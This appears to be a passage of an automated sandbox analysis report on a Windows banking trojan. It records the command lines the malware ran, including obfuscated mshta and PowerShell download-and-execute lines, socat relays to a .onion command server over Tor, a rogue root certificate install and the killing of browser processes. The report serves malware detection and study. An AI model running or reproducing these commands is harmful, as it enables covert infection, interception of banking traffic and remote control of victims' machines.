Source: C:\ProgramData\7za.exeFile created: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net452\fr\Microsoft.Win32.TaskScheduler.resources.dll
Source: C:\ProgramData\7za.exeFile created: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net35\de\Microsoft.Win32.TaskScheduler.resources.dll
Source: C:\ProgramData\7za.exeFile created: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net40\es\Microsoft.Win32.TaskScheduler.resources.dll
Source: C:\ProgramData\7za.exeFile created: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net20\zh-CN\Microsoft.Win32.TaskScheduler.resources.dll
Drops PE files to the application program directory (C:\ProgramData)Show sources
Source: C:\ProgramData\7za.exeFile created: C:\ProgramData\VitBTKxRu\socat-windows-1.7.2.1\cygwrap-0.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\7za.exe
Installs new ROOT certificatesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Tries to download and execute files (via powershell)Show sources
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' '$F=$env:Temp+'\\xeAcHBDS.exe';rm -Force $F;$cl=(New-Object Net.WebClient);$cl.DownloadFile('http://127.0.0.1:5555/0dTRgfA.asp?ts&ip='+$cl.DownloadString('http://api.ipify.org/'),$F);& $F'
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' '$F=$env:Temp+'\\xeAcHBDS.exe';rm -Force $F;$cl=(New-Object Net.WebClient);$cl.DownloadFile('http://127.0.0.1:5555/0dTRgfA.asp?ts&ip='+$cl.DownloadString('http://api.ipify.org/'),$F);& $F'
Tries to download files via bitsadminShow sources
Source: unknownProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\system32\cmd.exe' /b /c bitsadmin /transfer /download /priority HIGH 'https://torproject.urown.net/dist/torbrowser/7.0.8/tor-win32-0.3.1.7.zip' 'C:\Users\user~1\AppData\Local\Temp\8LtgeHPulp.zip'
Source: unknownProcess created: C:\Windows\System32\bitsadmin.exe bitsadmin /transfer /download /priority HIGH 'https://torproject.urown.net/dist/torbrowser/7.0.8/tor-win32-0.3.1.7.zip' 'C:\Users\user~1\AppData\Local\Temp\8LtgeHPulp.zip'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\system32\cmd.exe' /b /c bitsadmin /transfer /download /priority HIGH 'https://torproject.urown.net/dist/torbrowser/7.0.8/tor-win32-0.3.1.7.zip' 'C:\Users\user~1\AppData\Local\Temp\8LtgeHPulp.zip'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bitsadmin.exe bitsadmin /transfer /download /priority HIGH 'https://torproject.urown.net/dist/torbrowser/7.0.8/tor-win32-0.3.1.7.zip' 'C:\Users\user~1\AppData\Local\Temp\8LtgeHPulp.zip'

Data Obfuscation:

barindex
Compiles C# or VB.Net codeShow sources
Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\9kehql3e.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\9kehql3e.cmdline'
Contains functionality to dynamically determine API callsShow sources
Source: C:\ProgramData\7za.exeCode function: 6_2_00471C24 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,6_2_00471C24
PE file contains sections with non-standard namesShow sources
Source: 7za.exe.4.drStatic PE information: section name: .sxdata
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Users\user\Desktop\bbtsvbq.exeCode function: 1_2_013BC366 push ecx; ret 1_2_013BC379
Source: C:\Users\user\Desktop\bbtsvbq.exeCode function: 1_2_013B2036 push ecx; ret 1_2_013B2049
Source: C:\ProgramData\7za.exeCode function: 6_2_0046B890 push eax; ret 6_2_0046B8AE
Source: C:\ProgramData\7za.exeCode function: 6_2_00459590 push ecx; mov dword ptr [esp], ecx6_2_00459591
Source: C:\ProgramData\7za.exeCode function: 6_2_0046CC80 push eax; ret 6_2_0046CCAE
Source: C:\Windows\System32\mshta.exeCode function: 17_1_02805518 push eax; ret 17_1_02805548
Source: C:\ProgramData\VitBTKxRu\OZEImhRAzl\socat.exeCode function: 19_2_00425518 push eax; ret 19_2_00425548
Source: C:\ProgramData\VitBTKxRu\OZEImhRAzl\socat.exeCode function: 19_1_00425518 push eax; ret 19_1_00425548
Obfuscated command line foundShow sources
Source: unknownProcess created: C:\Windows\System32\mshta.exe mshta.exe vbscript:close(CreateObject('WScript.Shell').Run('powershell.exe ''$F=$env:Temp+'\\xeAcHBDS.exe';rm -Force $F;$cl=(New-Object Net.WebClient);$cl.DownloadFile('http://127.0.0.1:5555/0dTRgfA.asp?ts&ip='+$cl.Download'+'String('http://api.ipify.org/'),$F);& $F''',0,False))
Source: C:\Windows\System32\taskeng.exeProcess created: C:\Windows\System32\mshta.exe mshta.exe vbscript:close(CreateObject('WScript.Shell').Run('powershell.exe ''$F=$env:Temp+'\\xeAcHBDS.exe';rm -Force $F;$cl=(New-Object Net.WebClient);$cl.DownloadFile('http://127.0.0.1:5555/0dTRgfA.asp?ts&ip='+$cl.Download'+'String('http://api.ipify.org/'),$F);& $F''',0,False))
Powershell starts a process from the temp directoryShow sources
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ep Unrestricted -f 'C:\Users\user~1\AppData\Local\Temp\3s7V1nHq.ps1'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ep Unrestricted -f 'C:\Users\user~1\AppData\Local\Temp\3s7V1nHq.ps1'
Suspicious powershell command line foundShow sources
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ep Unrestricted -f 'C:\ProgramData\C4CqRww6.ps1'
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ep Unrestricted -f 'C:\Users\user~1\AppData\Local\Temp\3s7V1nHq.ps1'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ep Unrestricted -f 'C:\ProgramData\C4CqRww6.ps1'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ep Unrestricted -f 'C:\Users\user~1\AppData\Local\Temp\3s7V1nHq.ps1'

Spreading:

barindex
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\Desktop\bbtsvbq.exeCode function: 1_2_013B6ECA FindFirstFileExA,1_2_013B6ECA
Source: C:\ProgramData\7za.exeCode function: 6_2_0040B174 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,AreFileApisANSI,FindFirstFileA,6_2_0040B174
Source: C:\ProgramData\7za.exeCode function: 6_2_0040B6E9 __EH_prolog,FindFirstFileW,GetCurrentDirectoryW,6_2_0040B6E9
Enumerates the file systemShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming

System Summary:

barindex
Reads internet explorer settingsShow sources
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_USERS\Software\Microsoft\Internet Explorer\Settings
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Uses Microsoft SilverlightShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
Uses new MSVCR DllsShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\MSVCR80.dll
PE file contains a mix of data directories often seen in goodwareShow sources
Source: bbtsvbq.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: bbtsvbq.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: bbtsvbq.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: bbtsvbq.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: bbtsvbq.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: bbtsvbq.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
Source: bbtsvbq.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
PE file contains a debug data directoryShow sources
Source: bbtsvbq.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Binary contains paths to debug symbolsShow sources
Source: Binary string: mscorlib.pdb source: powershell.exe
Source: Binary string: C:\Windows\mscorlib.pdb source: powershell.exe
Source: Binary string: mscorrc.pdb source: powershell.exe
Source: Binary string: rlib.pdb source: powershell.exe
Source: Binary string: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe
Source: Binary string: C:\Users\dahall\Documents\Visual Studio 2010\Projects\TaskService\obj\Release\Microsoft.Win32.TaskScheduler.pdbt source: Microsoft.Win32.TaskScheduler.dll2.6.dr
Source: Binary string: c:\Users\user\AppData\Local\Temp\9kehql3e.pdb source: 9kehql3e.dll.35.dr
Source: Binary string: msado15.pdb source: bbtsvbq.exe
Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe
Source: Binary string: C:\Windows\dll\mscorlib.pdb source: powershell.exe
Source: Binary string: indows\mscorlib.pdbpdblib.pdb source: powershell.exe
Source: Binary string: C:\Users\dahall\Documents\Visual Studio 2010\Projects\TaskService\obj\Release\Microsoft.Win32.TaskScheduler.pdb source: powershell.exe, Microsoft.Win32.TaskScheduler.dll.6.dr, Microsoft.Win32.TaskScheduler.dll2.6.dr, Microsoft.Win32.TaskScheduler.dll1.6.dr
Source: Binary string: System.Management.Automation.pdb source: powershell.exe
Source: Binary string: msado15.pdb`Cr source: bbtsvbq.exe
Source: Binary string: scrrun.pdb source: bbtsvbq.exe
PE file contains a valid data directory to section mappingShow sources
Source: bbtsvbq.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: bbtsvbq.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: bbtsvbq.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: bbtsvbq.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: bbtsvbq.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Classification labelShow sources
Source: classification engineClassification label: mal100.evad.expl.spyw.bank.troj.winEXE@57/102@11/16
Contains functionality to instantiate COM classesShow sources
Source: C:\Users\user\Desktop\bbtsvbq.exeCode function: 1_2_013B1160 __EH_prolog3_GS,CoInitializeEx,CLSIDFromProgID,CoCreateInstance,1_2_013B1160
Creates files inside the user directoryShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations
Creates temporary filesShow sources
Source: C:\Users\user\Desktop\bbtsvbq.exeFile created: C:\Users\user~1\AppData\Local\Temp\3s7V1nHq.ps1
Found command line outputShow sources
Source: C:\Windows\System32\bitsadmin.exeConsole Write: ..........................0.....\...d...T.....................................%..d.wl.%....w.@......,.%.....8........;..
Source: C:\Windows\System32\bitsadmin.exeConsole Write: ..............0.....B.I.T.S.A.D.M.I.N. .v.e.r.s.i.o.n. .3...0. .[. .7...5...7.6.0.1. .].........X.I.8.%.H....;......8...
Source: C:\Windows\System32\bitsadmin.exeConsole Write: ..........0.........B.I.T.S. .a.d.m.i.n.i.s.t.r.a.t.i.o.n. .u.t.i.l.i.t.y....... .].........X.I.X.I.<.%.<............).w
Source: C:\Windows\System32\bitsadmin.exeConsole Write: ....................T.S. .a.d.m.i.n.i.s.t.r.a.t.i.o.n. .u.t.i.l.i.t.y....... .].........X.I.X.I.X.I.....R...............
Source: C:\Windows\System32\bitsadmin.exeConsole Write: ........................d.m.i.n.i.s.t.r.a.t.i.o.n. .u.t.i.l.i.t.y....... .].........X.I.X.I.X.I.....D.%...............%.
Source: C:\Windows\System32\bitsadmin.exeConsole Write: ....................d.m.i.n.i.s.t.r.a.t.i.o.n. .u.t.i.l.i.t.y....... .].........X.I.X.I.X.I.....X.I...................|.
Source: C:\Windows\System32\bitsadmin.exeConsole Write: ....................i.n.i.s.t.r.a.t.i.o.n. .u.t.i.l.i.t.y....... .].........X.I.X.I.X.I.....X.I.........................
Source: C:\Windows\System32\bitsadmin.exeConsole Write: ........................t.r.a.t.i.o.n. .u.t.i.l.i.t.y....... .].........X.I.X.I.X.I.....X.I.........P.%.................
Source: C:\Windows\System32\bitsadmin.exeConsole Write: ....................U.n.a.b.l.e. .t.o. .c.o.n.n.e.c.t. .t.o. .B.I.T.S. .-. .0.x.8.0.0.7.0.4.2.2.......%.P...`.....,.....
Source: C:\Windows\System32\bitsadmin.exeConsole Write: ..................................................................\w..........%...%.o.\w....H.%.#.\w........`.....,.....
Source: C:\Windows\System32\bitsadmin.exeConsole Write: ..................................................................\w..........%...%.o.\w....H.%.#.\w..%...........,.....
Source: C:\Windows\System32\bitsadmin.exeConsole Write: ..................................................................\w..........%...%.o.\w....H.%.#.\w..%.....`.....,.....
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..........X...}.#........Wa..........Wa...X...1m.p9...1m.-...k9...X.........|g9. w1.|g9...}...*..B...........p9...9.....
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..........X...*.#.....]w..X...............]w..0..................D..................#.........n.p.X...X.................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..........X...*./...x.e.'. .b.e.c.a.u.s.e. .i.t. .d.o.e.s. .n.o.t. .e.x.i.s.t......./.........n.0.X...X.<...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..........X...*./.....]w..X...............]w..0..................D................../.........n.p.X...X.................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..........X...*.;...A.t. .l.i.n.e.:.1. .c.h.a.r.:.3.3............E..................;.........n.0.X...X."...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..........X...*.;.....]w..X...............]w..0.................1E..................;.........n.p.X...X.................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..........X...*.G.....]w..X...............]w..0.................\E..................G.........n.0.X.....................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..........X...*.G.....]w..X...............]w..0.................zE..................G.........n.p.X...X.................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..........X...*.S.....]w..X...............]w..0..................E..................S.........n.0.X.....................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..........X...*.S.....]w..X...............]w..0..................E..................S.........n.p.X...X.................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..........X...*._...n.g.(.'.h.t.t.p.:././.a.p.i...i.p.i.f.y...o.r.g./.'.).,.$.F.).;.&. .$.F...n.0.X...X.H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..........X...*._.....]w..X...............]w..0..................F.................._.........n.p.X...X.................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..........X...*.k.....]w..X...............]w..0..................F..................k.........n.0.X.....................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..........X...*.k.....]w..X...............]w..0.................LF..................k.........n.p.X...X.................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..........X...*.w.....]w..X...............]w..0.................wF..................w.........n.0.X.....d...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..........X...*.w.....]w..X...............]w..0..................F..................w.........n.p.X...X.................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..........X...*.......]w..X...............]w..0..................F............................n.0.X.....................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..........X...*.......]w..X...............]w..0..................F............................n.p.X...X.................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..........X...*..... . . .e.I.t.e.m.C.o.m.m.a.n.d................G............................n.0.X...X.................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..........X...*.......]w..X...............]w..0..................G............................n.p.X...X.................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..........X...*..... .]w..X...............]w..0.................CG............................n.0.X...X.................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..........X...*.......]w..X...............]w..0.................aG............................n.p.X...X.................
Source: C:\Windows\System32\taskkill.exeConsole Write: ..........]w..0.............................................(.,.....0.......e.......o...n.......B.......Z...............
Source: C:\Windows\System32\taskkill.exeConsole Write: ..........]w..0.....`...d...T...............................(.".............d.......]...n.......B.......X...............
Source: C:\Windows\System32\taskkill.exeConsole Write: ..........]w..0.....d...$.......]........................... .......P.......c.......[...n.......B.......V...............
PE file has an executable .text section and no other executable sectionShow sources
Source: bbtsvbq.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Parts of this applications are using the .NET runtime (Probably coded in C#)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorlib.dll
Queries process information (via WMI, Win32_Process)Show sources
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;iexplore.exe&quot;)
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;firefox.exe&quot;)
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;chrome.exe&quot;)
Reads ini filesShow sources
Source: C:\Users\user\Desktop\bbtsvbq.exeFile read: C:\Users\user\Desktop\desktop.ini
Reads software policiesShow sources
Source: C:\Users\user\Desktop\bbtsvbq.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Sample is known by Antivirus (Virustotal or Metascan)Show sources
Source: bbtsvbq.exeVirustotal: hash found
Spawns processesShow sources
Source: unknownProcess created: C:\Users\user\Desktop\bbtsvbq.exe 'C:\Users\user\Desktop\bbtsvbq.exe'
Source: unknownProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c powershell -ep Unrestricted -f 'C:\ProgramData\C4CqRww6.ps1' | find /v '' >> 'C:\Users\user~1\AppData\Local\Temp\user-PC.log'
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ep Unrestricted -f 'C:\ProgramData\C4CqRww6.ps1'
Source: unknownProcess created: C:\Windows\System32\find.exe find /v ''
Source: unknownProcess created: C:\ProgramData\7za.exe 'C:\ProgramData\7za.exe' x -o'C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ' -y 'C:\Users\user~1\AppData\Local\Temp\QKB6w.zip'
Source: unknownProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\system32\cmd.exe' /b /c bitsadmin /transfer /download /priority HIGH 'https://torproject.urown.net/dist/torbrowser/7.0.8/tor-win32-0.3.1.7.zip' 'C:\Users\user~1\AppData\Local\Temp\8LtgeHPulp.zip'
Source: unknownProcess created: C:\Windows\System32\bitsadmin.exe bitsadmin /transfer /download /priority HIGH 'https://torproject.urown.net/dist/torbrowser/7.0.8/tor-win32-0.3.1.7.zip' 'C:\Users\user~1\AppData\Local\Temp\8LtgeHPulp.zip'
Source: unknownProcess created: C:\ProgramData\7za.exe 'C:\ProgramData\7za.exe' x -o'C:\ProgramData\VitBTKxRu' -y 'C:\Users\user~1\AppData\Local\Temp\8LtgeHPulp.zip'
Source: unknownProcess created: C:\Windows\System32\taskeng.exe taskeng.exe {7FB8942A-D520-4069-87A1-8D11961A18B0} S-1-5-21-312302014-279660585-3511680526-1005:user-PC\user:Interactive:[1]
Source: unknownProcess created: C:\Windows\System32\mshta.exe mshta.exe vbscript:close(CreateObject('WScript.Shell').Run('tor.exe',0,False))
Source: unknownProcess created: C:\ProgramData\VitBTKxRu\Tor\tor.exe 'C:\ProgramData\VitBTKxRu\Tor\tor.exe'
Source: unknownProcess created: C:\ProgramData\7za.exe 'C:\ProgramData\7za.exe' x -o'C:\ProgramData\VitBTKxRu' -y 'C:\Users\user~1\AppData\Local\Temp\sX7raTm2LP.zip'
Source: unknownProcess created: C:\Windows\System32\mshta.exe mshta.exe vbscript:close(CreateObject('WScript.Shell').Run('socat tcp4-LISTEN:5555,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:y6r2er4d6iyyrbzl.onion:80,socksport=9050',0,False))
Source: unknownProcess created: C:\Windows\System32\mshta.exe mshta.exe vbscript:close(CreateObject('WScript.Shell').Run('socat tcp4-LISTEN:5588,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:y6r2er4d6iyyrbzl.onion:5588,socksport=9050',0,False))
Source: unknownProcess created: C:\Windows\System32\mshta.exe mshta.exe vbscript:close(CreateObject('WScript.Shell').Run('powershell.exe ''$F=$env:Temp+'\\xeAcHBDS.exe';rm -Force $F;$cl=(New-Object Net.WebClient);$cl.DownloadFile('http://127.0.0.1:5555/0dTRgfA.asp?ts&ip='+$cl.Download'+'String('http://api.ipify.org/'),$F);& $F''',0,False))
Source: unknownProcess created: C:\ProgramData\VitBTKxRu\OZEImhRAzl\socat.exe 'C:\ProgramData\VitBTKxRu\OZEImhRAzl\socat.exe' tcp4-LISTEN:5588,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:y6r2er4d6iyyrbzl.onion:5588,socksport=9050
Source: unknownProcess created: C:\ProgramData\VitBTKxRu\OZEImhRAzl\socat.exe 'C:\ProgramData\VitBTKxRu\OZEImhRAzl\socat.exe' tcp4-LISTEN:5555,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:y6r2er4d6iyyrbzl.onion:80,socksport=9050
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' '$F=$env:Temp+'\\xeAcHBDS.exe';rm -Force $F;$cl=(New-Object Net.WebClient);$cl.DownloadFile('http://127.0.0.1:5555/0dTRgfA.asp?ts&ip='+$cl.DownloadString('http://api.ipify.org/'),$F);& $F'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe 'C:\Windows\System32\taskkill.exe' /F /im iexplore.exe
Source: unknownProcess created: C:\Windows\System32\taskkill.exe 'C:\Windows\System32\taskkill.exe' /F /im firefox.exe
Source: unknownProcess created: C:\Windows\System32\taskkill.exe 'C:\Windows\System32\taskkill.exe' /F /im chrome.exe
Source: unknownProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c powershell -ep Unrestricted -f 'C:\Users\user~1\AppData\Local\Temp\3s7V1nHq.ps1' | find /v '' >> 'C:\Users\user~1\AppData\Local\Temp\user-PC.log'
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ep Unrestricted -f 'C:\Users\user~1\AppData\Local\Temp\3s7V1nHq.ps1'
Source: unknownProcess created: C:\Windows\System32\find.exe find /v ''
Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\9kehql3e.cmdline'
Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RES8E7D.tmp' 'c:\Users\user\AppData\Local\Temp\CSC8E0E.tmp'
Source: unknownProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c powershell -ep Unrestricted -f 'C:\Users\user~1\AppData\Local\Temp\U5f96EAq.ps1' | find /v '' >> 'C:\Users\user~1\AppData\Local\Temp\user-PC.log'
Source: C:\Users\user\Desktop\bbtsvbq.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c powershell -ep Unrestricted -f 'C:\ProgramData\C4CqRww6.ps1' | find /v '' >> 'C:\Users\user~1\AppData\Local\Temp\user-PC.log'
Source: C:\Users\user\Desktop\bbtsvbq.exeProcess created: C:\Windows\System32\taskkill.exe 'C:\Windows\System32\taskkill.exe' /F /im iexplore.exe
Source: C:\Users\user\Desktop\bbtsvbq.exeProcess created: C:\Windows\System32\taskkill.exe 'C:\Windows\System32\taskkill.exe' /F /im firefox.exe
